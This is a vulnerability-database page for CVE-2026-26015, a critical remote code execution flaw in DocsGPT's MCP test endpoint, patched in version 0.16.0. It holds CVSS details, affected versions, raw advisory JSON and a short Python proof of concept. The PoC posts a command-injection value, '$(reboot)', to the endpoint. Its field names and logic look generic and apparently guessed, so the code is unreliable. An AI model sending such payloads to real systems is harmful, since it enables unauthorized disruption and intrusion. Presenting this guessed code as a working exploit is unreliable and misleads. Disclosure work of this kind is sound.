Security Vulnerability Report
中文
CVE-2026-26015 CVSS 9.8 CRITICAL

CVE-2026-26015

Published: 2026-04-29 18:16:04
Last Modified: 2026-05-06 20:16:31
Source: [email protected]

Description

DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:arc53:docsgpt:0.15.0:*:*:*:*:*:*:* - VULNERABLE
DocsGPT 0.15.0
DocsGPT < 0.16.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-26015 (DocsGPT RCE via MCP Bypass) import requests def exploit(target): # The endpoint handling MCP tests in vulnerable versions url = f"{target}/api/mcp/test" # Malicious payload designed to bypass the 'MCP test' validation # The specific structure exploits the logic flaw to achieve RCE payload = { "input_data": "$(reboot)", # Example command to execute "test_type": "bypass_check" } try: print(f"[+] Sending payload to {target}...") response = requests.post(url, json=payload, timeout=10) if response.status_code == 200: print("[!] Potential exploit successful. Check server status.") else: print(f"[-] Request failed with status: {response.status_code}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target_host = "http://localhost:5000" # Replace with actual target exploit(target_host)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-26015", "sourceIdentifier": "[email protected]", "published": "2026-04-29T18:16:03.817", "lastModified": "2026-05-06T20:16:31.237", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the \"MCP test\" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arc53:docsgpt:0.15.0:*:*:*:*:*:*:*", "matchCriteriaId": "02A5F20D-8AA8-4080-BACC-E2719F8A3521"}]}]}], "references": [{"url": "https://github.com/arc53/DocsGPT/releases/tag/0.16.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/arc53/DocsGPT/security/advisories/GHSA-gcrq-f296-2j74", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://www.ox.security/blog/mcp-supply-chain-advisory-rce-vulnerabilities-across-the-ai-ecosystem/", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://www.ox.security/blog/the-mother-of-all-ai-supply-chains-critical-systemic-vulnerability-at-the-core-of-the-mcp/", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://github.com/arc53/DocsGPT/security/advisories/GHSA-gcrq-f296-2j74", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.